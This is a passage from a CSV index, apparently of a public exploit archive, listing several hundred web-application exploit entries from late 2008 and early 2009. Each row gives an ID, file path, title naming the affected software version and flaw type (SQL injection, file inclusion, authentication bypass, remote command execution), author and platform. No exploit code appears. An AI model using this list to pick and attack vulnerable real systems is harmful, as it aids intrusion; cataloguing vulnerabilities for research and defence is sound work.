Injection",2008-12-24,boom3rang,webapps,php, +7573,exploits/php/webapps/7573.txt,"Joomla! Component Live Ticker 1.0 - Blind SQL Injection",2008-12-24,boom3rang,webapps,php, +7574,exploits/php/webapps/7574.txt,"Joomla! Component mDigg 2.2.8 - 'category' SQL Injection",2008-12-24,boom3rang,webapps,php, +7575,exploits/php/webapps/7575.pl,"Joomla! Component 5starhotels - SQL Injection",2008-12-24,EcHoLL,webapps,php, +7576,exploits/php/webapps/7576.pl,"PHP-Fusion 7.0.2 - Blind SQL Injection",2008-12-24,StAkeR,webapps,php, +7579,exploits/php/webapps/7579.txt,"ClaSS 0.8.60 - 'export.php' Local File Inclusion",2008-12-24,fuzion,webapps,php, +7580,exploits/php/webapps/7580.txt,"BloofoxCMS 0.3.4 - 'lang' Local File Inclusion",2008-12-24,fuzion,webapps,php, +7586,exploits/php/webapps/7586.txt,"Miniweb 2.0 - Authentication Bypass",2008-12-28,bizzit,webapps,php, +7587,exploits/php/webapps/7587.txt,"Joomla! Component PAX Gallery 0.1 - Blind SQL Injection",2008-12-28,XaDoS,webapps,php, +7593,exploits/php/webapps/7593.pl,"DeluxeBB 1.2 - Blind SQL Injection",2008-12-28,StAkeR,webapps,php, +7595,exploits/php/webapps/7595.txt,"FubarForum 1.6 - Arbitrary Authentication Bypass",2008-12-28,k3yv4n,webapps,php, +7596,exploits/php/webapps/7596.txt,"Alstrasoft Web Email Script Enterprise - 'id' SQL Injection",2008-12-28,Bgh7,webapps,php, +7597,exploits/php/webapps/7597.txt,"OwenPoll 1.0 - Insecure Cookie Handling",2008-12-28,Osirys,webapps,php, +7598,exploits/php/webapps/7598.txt,"PHP-Fusion Mod TI - 'id' SQL Injection",2008-12-28,"Khashayar Fereidani",webapps,php, +7599,exploits/asp/webapps/7599.txt,"ForumApp 3.3 - Remote Database Disclosure",2008-12-28,Cyber.Zer0,webapps,asp, +7600,exploits/php/webapps/7600.pl,"Flexphplink Pro - Arbitrary File Upload",2008-12-28,Osirys,webapps,php, +7601,exploits/php/webapps/7601.txt,"Silentum LoginSys 1.0.0 - Insecure Cookie Handling",2008-12-28,Osirys,webapps,php, +7602,exploits/php/webapps/7602.txt,"webClassifieds 2005 - Authentication Bypass",2008-12-29,AnGeL25dZ,webapps,php, +7603,exploits/php/webapps/7603.txt,"eDNews 2.0 - Local File Inclusion",2008-12-29,GoLd_M,webapps,php, +7604,exploits/php/webapps/7604.txt,"eDContainer 2.22 - Local File Inclusion",2008-12-29,GoLd_M,webapps,php, +7605,exploits/php/webapps/7605.php,"TaskDriver 1.3 - Remote Change Admin Password",2008-12-29,cOndemned,webapps,php, +7606,exploits/php/webapps/7606.txt,"FubarForum 1.6 - Authentication Bypass Change User Password",2008-12-29,R31P0l,webapps,php, +7607,exploits/php/webapps/7607.pl,"Ultimate PHP Board 2.2.1 - Privilege Escalation",2008-12-29,StAkeR,webapps,php, +7609,exploits/asp/webapps/7609.txt,"Sepcity Shopping Mall - SQL Injection",2008-12-29,Osmanizim,webapps,asp, +7610,exploits/asp/webapps/7610.txt,"Sepcity Lawyer Portal - SQL Injection",2008-12-29,Osmanizim,webapps,asp, +7611,exploits/php/webapps/7611.php,"CMS NetCat 3.0/3.12 - Blind SQL Injection",2008-12-29,s4avrd0w,webapps,php, +7612,exploits/php/webapps/7612.txt,"Joomla! Component com_na_content 1.0 - Blind SQL Injection",2008-12-29,"Mehmet Ince",webapps,php, +7613,exploits/asp/webapps/7613.txt,"Sepcity Classified - 'ID' SQL Injection",2008-12-29,S.W.A.T.,webapps,asp, +7614,exploits/php/webapps/7614.txt,"FlexPHPDirectory 0.0.1 - Authentication Bypass",2008-12-29,x0r,webapps,php, +7615,exploits/php/webapps/7615.txt,"Flexphpsite 0.0.1 - Authentication Bypass",2008-12-29,x0r,webapps,php, +7616,exploits/php/webapps/7616.txt,"Flexphplink 0.0.x - Authentication Bypass",2008-12-29,x0r,webapps,php, +7619,exploits/php/webapps/7619.txt,"eDNews 2.0 - SQL Injection",2008-12-29,"Virangar Security",webapps,php, +7620,exploits/php/webapps/7620.txt,"ThePortal 2.2 - Arbitrary File Upload",2008-12-29,siurek22,webapps,php, +7621,exploits/php/webapps/7621.txt,"PHPAlumni - SQL Injection",2008-12-29,Mr.SQL,webapps,php, +7622,exploits/php/webapps/7622.txt,"Flexcustomer 0.0.6 - Admin Authentication Bypass / Possible PHP Code Writing",2008-12-29,Osirys,webapps,php, +7624,exploits/php/webapps/7624.txt,"Flexphpic 0.0.x - Authentication Bypass",2008-12-30,S.W.A.T.,webapps,php, +7625,exploits/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,webapps,php, +7626,exploits/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - Blind SQL Injection",2008-12-30,x0r,webapps,php, +7627,exploits/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,webapps,asp, +7628,exploits/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",webapps,php, +7629,exploits/php/webapps/7629.txt,"DDL-Speed Script - 'acp/backup' Admin Backup Bypass",2009-01-01,tmh,webapps,php, +7631,exploits/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,webapps,php, +7633,exploits/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,webapps,php, +7635,exploits/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,webapps,php, +7636,exploits/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,webapps,php, +7638,exploits/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,webapps,php, +7639,exploits/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Configuration Disclosure",2009-01-01,ahmadbady,webapps,php, +7640,exploits/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,webapps,php, +7641,exploits/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' SQL Injection",2009-01-01,"Virangar Security",webapps,php, +7642,exploits/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",webapps,php, +7644,exploits/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,webapps,php, +7645,exploits/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,webapps,php, +7648,exploits/php/webapps/7648.txt,"phpskelsite 1.4 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,webapps,php, +7650,exploits/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection Vulnerabilities",2009-01-03,darkjoker,webapps,php, +7653,exploits/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,webapps,php, +7657,exploits/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,webapps,php, +7658,exploits/php/webapps/7658.pl,"PNPHPBB2 < 1.2i - 'ModName' Multiple Local File Inclusions",2009-01-04,StAkeR,webapps,php, +7659,exploits/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,webapps,php, +7660,exploits/php/webapps/7660.txt,"PHPMesFilms 1.0 - 'index.php?id' SQL Injection",2009-01-04,SuB-ZeRo,webapps,php, +7663,exploits/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,webapps,php, +7664,exploits/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,webapps,php, +7665,exploits/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,webapps,asp, +7666,exploits/asp/webapps/7666.txt,"Ayemsis Emlak Pro - Authentication Bypass",2009-01-05,ByALBAYX,webapps,asp, +7667,exploits/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,webapps,php, +7668,exploits/php/webapps/7668.pl,"Cybershade CMS 0.2b - 'index.php' Remote File Inclusion",2009-01-05,JosS,webapps,php, +7669,exploits/php/webapps/7669.pl,"Joomla! Component com_na_newsdescription - 'newsid' SQL Injection",2009-01-05,EcHoLL,webapps,php, +7670,exploits/php/webapps/7670.pl,"Joomla! Component com_phocadocumentation - 'id' SQL Injection",2009-01-05,EcHoLL,webapps,php, +7672,exploits/php/webapps/7672.txt,"PHPAuctionSystem - Cross-Site Scripting / SQL Injection",2009-01-05,x0r,webapps,php, +7674,exploits/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,webapps,php, +7678,exploits/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusions",2009-01-06,darkmasking,webapps,php, +7679,exploits/php/webapps/7679.php,"RiotPix 0.61 - 'forumid' Blind SQL Injection",2009-01-06,cOndemned,webapps,php, +7680,exploits/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,webapps,php, +7682,exploits/php/webapps/7682.txt,"RiotPix 0.61 - Authentication Bypass",2009-01-06,ZoRLu,webapps,php, +7683,exploits/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,webapps,php, +7686,exploits/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,webapps,php, +7687,exploits/php/webapps/7687.txt,"PlaySms 0.9.3 - Multiple Local/Remote File Inclusions",2009-01-06,ahmadbady,webapps,php, +7689,exploits/php/webapps/7689.txt,"BlogHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,webapps,php, +7690,exploits/php/webapps/7690.txt,"PollHelper - Remote Configuration File Disclosure",2009-01-06,ahmadbady,webapps,php, +7691,exploits/php/webapps/7691.php,"Joomla! Component xstandard editor 1.5.8 - Local Directory Traversal",2009-01-07,irk4z,webapps,php, +7697,exploits/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection",2009-01-07,"Khashayar Fereidani",webapps,php, +7698,exploits/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 - 'items.php' SQL Injection",2009-01-07,"Khashayar Fereidani",webapps,php, +7699,exploits/php/webapps/7699.txt,"QuoteBook - Remote Configuration File Disclosure",2009-01-07,Moudi,webapps,php, +7700,exploits/php/webapps/7700.php,"CuteNews 1.4.6 - 'ip ban' Authorized Cross-Site Scripting / Command Execution",2009-01-08,StAkeR,webapps,php, +7703,exploits/php/webapps/7703.txt,"PHP-Fusion Mod vArcade 1.8 - 'comment_id' SQL Injection",2009-01-08,"Khashayar Fereidani",webapps,php, +7704,exploits/php/webapps/7704.pl,"Pizzis CMS 1.5.1 - Blind SQL Injection",2009-01-08,darkjoker,webapps,php, +7705,exploits/php/webapps/7705.pl,"XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution",2009-01-08,StAkeR,webapps,php, +7711,exploits/php/webapps/7711.txt,"Fast FAQs System - Authentication Bypass",2009-01-09,x0r,webapps,php, +7716,exploits/php/webapps/7716.pl,"Joomla! Component com_xevidmegahd - SQL Injection",2009-01-11,EcHoLL,webapps,php, +7717,exploits/php/webapps/7717.pl,"Joomla! Component com_jashowcase - 'catid' SQL Injection",2009-01-11,EcHoLL,webapps,php, +7718,exploits/php/webapps/7718.txt,"Joomla! Component com_newsflash - 'id' SQL Injection",2009-01-11,EcHoLL,webapps,php, +7719,exploits/php/webapps/7719.txt,"Fast Guest Book - Authentication Bypass",2009-01-11,Moudi,webapps,php, +7722,exploits/php/webapps/7722.txt,"DZcms 3.1 - SQL Injection",2009-01-11,"Glafkos Charalambous",webapps,php, +7723,exploits/php/webapps/7723.txt,"Seo4SMF for SMF forums - Multiple Vulnerabilities",2009-01-11,WHK,webapps,php, +7724,exploits/php/webapps/7724.php,"phpMDJ 1.0.3 - 'id_animateur' Blind SQL Injection",2009-01-11,darkjoker,webapps,php, +7725,exploits/php/webapps/7725.txt,"XOOPS Module tadbook2 - SQL Injection",2009-01-11,stylextra,webapps,php, +7726,exploits/php/webapps/7726.txt,"BKWorks ProPHP 0.50b1 - Authentication Bypass",2009-01-11,SirGod,webapps,php, +7728,exploits/php/webapps/7728.txt,"Weight Loss Recipe Book 3.1 - Authentication Bypass",2009-01-11,x0r,webapps,php, +7729,exploits/php/webapps/7729.txt,"PHP-Fusion Mod the_kroax - SQL Injection",2009-01-11,FasTWORM,webapps,php, +7730,exploits/php/webapps/7730.txt,"Social Engine - SQL Injection",2009-01-11,snakespc,webapps,php, +7731,exploits/php/webapps/7731.txt,"fttss 2.0 - Remote Command Execution",2009-01-11,dun,webapps,php, +7732,exploits/php/webapps/7732.php,"Silentum Uploader 1.4.0 - Remote File Deletion",2009-01-11,"Danny Moules",webapps,php, +7733,exploits/php/webapps/7733.txt,"Photobase 1.2 - 'Language' Local File Inclusion",2009-01-11,Osirys,webapps,php, +7734,exploits/php/webapps/7734.txt,"Joomla! Component Portfol 1.2 - 'vcatid' SQL Injection",2009-01-12,H!tm@N,webapps,php, +7735,exploits/php/webapps/7735.pl,"Simple Machines Forum (SMF) 1.0.13/1.1.5 - 'Destroyer 0.1' Password Reset Security Bypass",2009-01-12,Xianur0,webapps,php, +7736,exploits/asp/webapps/7736.html,"Comersus Shopping Cart 6.0 - Remote User Pass",2009-01-12,ajann,webapps,asp, +7738,exploits/php/webapps/7738.txt,"WordPress Plugin WP-Forum 1.7.8 - SQL Injection",2009-01-12,seomafia,webapps,php, +7740,exploits/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Arbitrary File Upload",2009-01-12,ahmadbady,webapps,php, +7741,exploits/asp/webapps/7741.txt,"dMx READ - Remote Database Disclosure",2009-01-12,Cyber-Zone,webapps,asp, +7743,exploits/php/webapps/7743.txt,"Realtor 747 - 'define.php?INC_DIR' Remote File Inclusion",2009-01-12,ahmadbady,webapps,php, +7744,exploits/asp/webapps/7744.txt,"Virtual Guestbook 2.1 - Remote Database Disclosure",2009-01-13,Moudi,webapps,asp, +7746,exploits/php/webapps/7746.txt,"Joomla! Component gigCalendar 1.0 - SQL Injection",2009-01-13,boom3rang,webapps,php, +7752,exploits/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,webapps,asp, +7753,exploits/cgi/webapps/7753.pl,"HSPell 1.1 - 'cilla.cgi' Remote Command Execution",2009-01-13,ZeN,webapps,cgi, +7754,exploits/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,webapps,asp, +7758,exploits/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - Authentication Bypass",2009-01-13,darkjoker,webapps,php, +7759,exploits/php/webapps/7759.txt,"Syzygy CMS 0.3 - Authentication Bypass",2009-01-14,darkjoker,webapps,php, +7761,exploits/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,webapps,asp, +7764,exploits/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,webapps,php, +7766,exploits/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,webapps,asp, +7767,exploits/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,webapps,asp, +7768,exploits/asp/webapps/7768.txt,"DMXReady Contact Us Manager 1.1 - Remote Contents Change",2009-01-14,ajann,webapps,asp, +7769,exploits/asp/webapps/7769.txt,"DMXReady Document Library Manager 1.1 - Contents Change",2009-01-14,ajann,webapps,asp, +7770,exploits/asp/webapps/7770.txt,"DMXReady Faqs Manager 1.1 - Remote Contents Change",2009-01-14,ajann,webapps,asp, +7771,exploits/asp/webapps/7771.txt,"DMXReady Job Listing 1.1 - Remote Contents Change",2009-01-14,ajann,webapps,asp, +7772,exploits/asp/webapps/7772.txt,"DMXReady Links Manager 1.1 - Remote Contents Change",2009-01-14,ajann,webapps,asp, +7773,exploits/asp/webapps/7773.txt,"DMXReady Member Directory Manager 1.1 - SQL Injection",2009-01-14,ajann,webapps,asp, +7774,exploits/asp/webapps/7774.txt,"DMXReady Members Area Manager 1.2 - SQL Injection",2009-01-14,ajann,webapps,asp, +7775,exploits/php/webapps/7775.txt,"Joomla! Component Camelcitydb2 2.2 - SQL Injection",2009-01-14,H!tm@N,webapps,php, +7777,exploits/php/webapps/7777.txt,"Joomla! Component Fantasytournament - SQL Injection",2009-01-14,H!tm@N,webapps,php, +7778,exploits/php/webapps/7778.txt,"phpList 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,webapps,php, +7780,exploits/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution",2009-01-14,Osirys,webapps,php, +7782,exploits/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,webapps,asp, +7783,exploits/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,webapps,asp, +7784,exploits/asp/webapps/7784.txt,"DMXReady Registration Manager 1.1 - Contents Change",2009-01-14,ajann,webapps,asp, +7786,exploits/php/webapps/7786.txt,"PHP Photo Album 0.8b - 'preview' Local File Inclusion",2009-01-14,Osirys,webapps,php, +7787,exploits/php/webapps/7787.txt,"DMXReady Secure Document Library 1.1 - SQL Injection",2009-01-14,ajann,webapps,php, +7788,exploits/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,webapps,asp, +7789,exploits/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Arbitrary File Download",2009-01-14,ajann,webapps,asp, +7791,exploits/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,webapps,asp, +7792,exploits/php/webapps/7792.txt,"GNUBoard 4.31.03 (08.12.29) - Local File Inclusion",2009-01-15,flyh4t,webapps,php, +7793,exploits/php/webapps/7793.php,"Joomla! Component com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,webapps,php, +7795,exploits/php/webapps/7795.txt,"Joomla! Component RD-Autos 1.5.5 - SQL Injection",2009-01-15,H!tm@N,webapps,php, +7796,exploits/php/webapps/7796.txt,"MKPortal 1.2.1 - Multiple Vulnerabilities",2009-01-15,waraxe,webapps,php, +7797,exploits/php/webapps/7797.php,"Blue Eye CMS 1.0.0 - 'clanek' Blind SQL Injection",2009-01-15,darkjoker,webapps,php, +7798,exploits/php/webapps/7798.txt,"Free Bible Search PHP Script - SQL Injection",2009-01-15,nuclear,webapps,php, +7800,exploits/asp/webapps/7800.txt,"eFAQ - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp, +7801,exploits/asp/webapps/7801.txt,"eReservations - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp, +7802,exploits/asp/webapps/7802.txt,"The Walking Club - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp, +7803,exploits/asp/webapps/7803.txt,"Ping IP - Authentication Bypass",2009-01-16,ByALBAYX,webapps,asp, +7805,exploits/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,webapps,php, +7806,exploits/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,webapps,php, +7807,exploits/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - Authentication Bypass",2009-01-16,SuB-ZeRo,webapps,asp, +7809,exploits/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,webapps,php, +7810,exploits/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,webapps,php, +7811,exploits/php/webapps/7811.txt,"Aj Classifieds For Sale 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,webapps,php, +7813,exploits/php/webapps/7813.txt,"Simple PHP NewsLetter 1.5 - Local File Inclusion",2009-01-16,ahmadbady,webapps,php, +7814,exploits/php/webapps/7814.txt,"BibCiter 1.4 - Multiple SQL Injections",2009-01-16,nuclear,webapps,php, +7815,exploits/php/webapps/7815.txt,"Joomla! Component Gigcal 1.x - 'id' SQL Injection",2009-01-18,Lanti-Net,webapps,php, +7816,exploits/asp/webapps/7816.txt,"DS-IPN.NET Digital Sales IPN - Database Disclosure",2009-01-18,Moudi,webapps,asp, +7817,exploits/php/webapps/7817.txt,"Click&Email - Authentication Bypass",2009-01-18,SuB-ZeRo,webapps,php, +7818,exploits/php/webapps/7818.txt,"SCMS 1 - Local File Inclusion",2009-01-18,ahmadbady,webapps,php, +7819,exploits/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,webapps,php, +7820,exploits/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change",2009-01-19,Osirys,webapps,php, +7821,exploits/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,webapps,php, +7824,exploits/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Blind SQL Injection",2009-01-19,InjEctOr5,webapps,php, +7828,exploits/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,webapps,php, +7829,exploits/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Persistent Cross-Site Scripting",2009-01-19,Osirys,webapps,php, +7830,exploits/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",webapps,php, +7831,exploits/php/webapps/7831.txt,"Ninja Blog 4.8 - Remote Information Disclosure",2009-01-19,"Danny Moules",webapps,php, +7832,exploits/php/webapps/7832.txt,"phpads 2.0 - Multiple Vulnerabilities",2009-01-19,"Danny Moules",webapps,php, +7833,exploits/php/webapps/7833.php,"Joomla! Component com_waticketsystem - Blind SQL Injection",2009-01-19,InjEctOr5,webapps,php, +7834,exploits/php/webapps/7834.txt,"Ninja Blog 4.8 - Cross-Site Request Forgery/HTML Injection",2009-01-19,"Danny Moules",webapps,php, +7835,exploits/php/webapps/7835.html,"Max.Blog 1.0.6 - Arbitrary Delete Post",2009-01-20,SirGod,webapps,php, +7836,exploits/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,webapps,php, +7837,exploits/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,webapps,php, +7838,exploits/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - Local File Inclusion",2009-01-20,Stack,webapps,php, +7840,exploits/php/webapps/7840.pl,"Joomla! Component Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,webapps,php, +7841,exploits/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - SQL Injection",2009-01-21,"Br1ght D@rk",webapps,php, +7844,exploits/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - 'passwd.dat' File Disclosure",2009-01-21,Pouya_Server,webapps,php, +7846,exploits/php/webapps/7846.php,"Joomla! Component com_pcchess - Blind SQL Injection",2009-01-21,InjEctOr5,webapps,php, +7847,exploits/php/webapps/7847.txt,"Joomla! Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,webapps,php, +7849,exploits/php/webapps/7849.txt,"OwnRS Blog 1.2 - 'autor.php' SQL Injection",2009-01-22,nuclear,webapps,php, +7850,exploits/asp/webapps/7850.txt,"asp-project 1.0 - Insecure Cookie Method",2009-01-22,"Khashayar Fereidani",webapps,asp, +7851,exploits/php/webapps/7851.php,"Pardal CMS 0.2.0 - Blind SQL Injection",2009-01-22,darkjoker,webapps,php, +7859,exploits/php/webapps/7859.pl,"MemHT Portal 4.0.1 - Remote Code Execution",2009-01-25,StAkeR,webapps,php, +7860,exploits/php/webapps/7860.php,"Mambo Component com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",webapps,php, +7861,exploits/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - Authentication Bypass",2009-01-25,ByALBAYX,webapps,asp, +7862,exploits/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,webapps,php, +7863,exploits/php/webapps/7863.txt,"OpenGoo 1.1 - Local File Inclusion",2009-01-25,fuzion,webapps,php, +7864,exploits/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - 'Password.dat' Disclosure",2009-01-25,Pouya_Server,webapps,php, +7866,exploits/php/webapps/7866.txt,"Simple Machines Forum (SMF) 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,webapps,php, +7867,exploits/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - Blind SQL Injection",2009-01-26,fuzion,webapps,php, +7872,exploits/asp/webapps/7872.txt,"E-ShopSystem - Authentication Bypass / SQL Injection",2009-01-26,InjEctOr5,webapps,asp, +7873,exploits/php/webapps/7873.txt,"Script Toko Online 5.01 - SQL Injection",2009-01-26,k1n9k0ng,webapps,php, +7874,exploits/php/webapps/7874.txt,"SHOP-INET 4 - 'grid' SQL Injection",2009-01-26,FeDeReR,webapps,php, +7876,exploits/php/webapps/7876.php,"PHP-CMS 1 - 'Username' Blind SQL Injection",2009-01-26,darkjoker,webapps,php, +7877,exploits/php/webapps/7877.txt,"Wazzum Dating Software - 'userid' SQL Injection",2009-01-26,nuclear,webapps,php, +7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php, +7879,exploits/php/webapps/7879.pl,"SiteXS CMS 0.1.1 - Local File Inclusion",2009-01-26,darkjoker,webapps,php, +7880,exploits/php/webapps/7880.txt,"ClickAuction - Authentication Bypass",2009-01-26,R3d-D3V!L,webapps,php, +7881,exploits/php/webapps/7881.txt,"Joomla! Component ElearningForce Flash Magazine Deluxe - SQL Injection",2009-01-26,TurkGuvenligi,webapps,php, +7883,exploits/php/webapps/7883.txt,"OpenX 2.6.3 - 'MAX_type' Local File Inclusion",2009-01-26,"Charlie Briggs",webapps,php, +7884,exploits/php/webapps/7884.txt,"Flax Article Manager 1.1 - Remote PHP Script Upload",2009-01-27,S.W.A.T.,webapps,php, +7885,exploits/php/webapps/7885.txt,"Max.Blog 1.0.6 - 'show_post.php' SQL Injection",2009-01-27,"Salvatore Fresta",webapps,php, +7886,exploits/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusions",2009-01-27,DSecRG,webapps,php, +7892,exploits/php/webapps/7892.php,"Community CMS 0.4 - 'id' Blind SQL Injection",2009-01-28,darkjoker,webapps,php, +7893,exploits/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,webapps,php, +7894,exploits/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,webapps,php, +7895,exploits/php/webapps/7895.txt,"Gazelle CMS 1.0 - 'template' Local File Inclusion",2009-01-28,fuzion,webapps,php, +7896,exploits/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,webapps,php, +7897,exploits/php/webapps/7897.php,"phpList 2.10.x - Remote Code Execution / Local File Inclusion",2009-01-28,mozi,webapps,php, +7898,exploits/php/webapps/7898.txt,"Max.Blog 1.0.6 - 'submit_post.php' SQL Injection",2009-01-28,"Salvatore Fresta",webapps,php, +7899,exploits/php/webapps/7899.txt,"Max.Blog 1.0.6 - 'offline_auth.php' Offline Authentication Bypass",2009-01-28,"Salvatore Fresta",webapps,php, +7900,exploits/php/webapps/7900.txt,"Social Engine 3.06 - 'category_id' SQL Injection",2009-01-28,snakespc,webapps,php, +7901,exploits/php/webapps/7901.py,"SmartSiteCMS 1.0 - Blind SQL Injection",2009-01-28,certaindeath,webapps,php, +7905,exploits/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,webapps,php, +7908,exploits/php/webapps/7908.txt,"Star Articles 6.0 - Remote Contents Change",2009-01-29,ByALBAYX,webapps,php, +7909,exploits/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote File Upload",2009-01-29,"Michael Brooks",webapps,php, +7911,exploits/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,webapps,php, +7916,exploits/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - Authentication Bypass",2009-01-29,"Mehmet Ince",webapps,php, +7917,exploits/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - Blind SQL Injection",2009-01-29,darkjoker,webapps,php, +7922,exploits/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",webapps,php, +7924,exploits/asp/webapps/7924.txt,"SalesCart - Authentication Bypass",2009-01-30,ByALBAYX,webapps,asp, +7925,exploits/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,webapps,php, 